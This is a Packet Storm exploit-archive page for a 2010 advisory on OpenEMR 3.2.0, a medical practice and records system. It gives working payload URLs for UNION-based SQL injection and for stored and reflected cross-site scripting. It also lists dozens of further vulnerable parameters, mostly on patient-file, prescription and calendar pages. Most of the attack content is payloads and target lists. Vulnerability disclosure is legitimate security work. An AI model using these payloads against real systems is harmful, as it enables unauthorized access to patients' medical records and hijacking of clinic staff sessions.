what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OpenEMR 3.2.0 SQL Injection / Cross Site Scripting

OpenEMR 3.2.0 SQL Injection / Cross Site Scripting
Posted Dec 27, 2010
Authored by Blake

OpenEMR version 3.2.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 9ca836e02286319ce83ae42b646fda3eb4771e29dac9f5fdfbd9b81bc55b9b34

OpenEMR 3.2.0 SQL Injection / Cross Site Scripting

Change Mirror Download
# Exploit Title: OpenEMR v3.2.0 Multiple Vulnerabilities
# Date: December 26, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/openemr/
# Version: 3.2.0
# Tested on: Windows XP SP3


Description:
Open Source Practice Management, Electronic Medical Record, Prescription Writing and Medical Billing application.


SQL Injection:

The issue parameter is vulnerable to sql injection:

http://192.168.1.127/openemr/interface/patient_file/summary/add_edit_issue.php?issue=0+union+select+null,null,null,@@version,system_user(),database(),user(),null,null,null,null,null,null,null,null,null,null,null,null--

Additional vulnerable parameters:
/openemr/controller.php [prescription&list&id parameter]
/openemr/controller.php [prescription&multip rintcss&id parameter]
/openemr/interface/main /calendar/index.php [pc_facility parameter]
/openemr/interface /patient_file/summary/add _edit_issue.php [issue parameter]
/openemr/interface /patient_file/summary /demographics.php [set_pid parameter]
/openemr/interface /patient_file/summary /immunizations.php [administered_by_id parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [assigned_to parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [form_note_type parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [noteid parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [offset parameter]


Stored XSS:
The note parameter is vulnerable to stored XSS:

http://192.168.1.127/openemr/interface/patient_file/summary/immunizations.php?mode=add&id=&pid=98&form_immunization_id=6&administered_date=2010-12-26&manufacturer=&lot_number=&administered_by=Administrator%2C+&administered_by_id=1&education_date=2010-12-26&vis_date=2010-12-26&note=%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E

Additional vulnerable parameters:
/openemr/interface /logview/logview.php [rumple parameter]
/openemr/interface /patient_file/report /patient_report.php [form_title parameter]
/openemr/interface /patient_file/summary /immunizations.php [manufacturer parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [assigned_to parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [rumple parameter]
/openemr/interface /usergroup/usergroup _admin.php [rumple parameter]

Reflected XSS:
The parent_id parameter is vulnerable to reflected XSS:

http://192.168.1.127/openemr/controller.php?document&upload&patient_id=2&parent_id=%22%3E%3Cscript%3Ealert%2810%29%3C/script%3E

Additional vulnerable parameters:
/openemr/controller.php [document&list&patient_id parameter]
/openemr/controller.php [document&upload&patient _id parameter]
/openemr/controller.php [document&upload&patient _id parameter]
/openemr/controller.php [parent_id parameter]
/openemr/controller.php [prescription&list&id parameter]
/openemr/interface/forms /newpatient/save.php [facility_id parameter]
/openemr/interface/forms /newpatient/save.php [form_date parameter]
/openemr/interface/forms /newpatient/save.php [form_date parameter]
/openemr/interface/forms /newpatient/save.php [form_onset_date parameter]
/openemr/interface/forms /newpatient/save.php [form_sensitivity parameter]
/openemr/interface/forms /newpatient/save.php [mode parameter]
/openemr/interface/forms /newpatient/save.php [pc_catid parameter]
/openemr/interface/forms /newpatient/save.php [reason parameter]
/openemr/interface /language/language.php [edit parameter]
/openemr/interface /language/language.php [m parameter]
/openemr/interface/main /calendar/index.php [&pc_username[] parameter]
/openemr/interface/main /calendar/index.php [pc_category parameter]
/openemr/interface/main /calendar/index.php [pc_topic parameter]
/openemr/interface/main /calendar/index.php [tplview parameter]
/openemr/interface /patient_file/deleter.php [billing parameter]
/openemr/interface /patient_file/summary/add _edit_issue.php [issue parameter]
/openemr/interface /patient_file/summary /demographics.php [set_pid parameter]
/openemr/interface /patient_file/summary /immunizations.php [administered_by_id parameter]
/openemr/interface /patient_file/summary /immunizations.php [lot_number parameter]
/openemr/interface /patient_file/summary /immunizations.php [manufacturer parameter]
/openemr/interface /patient_file/summary /immunizations.php [note parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [assigned_to parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [form_active parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [form_inactive parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [noteid parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [set_pid parameter]
/openemr/interface /usergroup/usergroup _admin.php [groupname parameter]
/openemr/interface /usergroup/usergroup _admin.php [rumple parameter]
/openemr/interface /patient_file/summary/add _edit_issue.php [form_title parameter]
/openemr/interface /patient_file/summary /pnotes_full.php [note parameter]

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close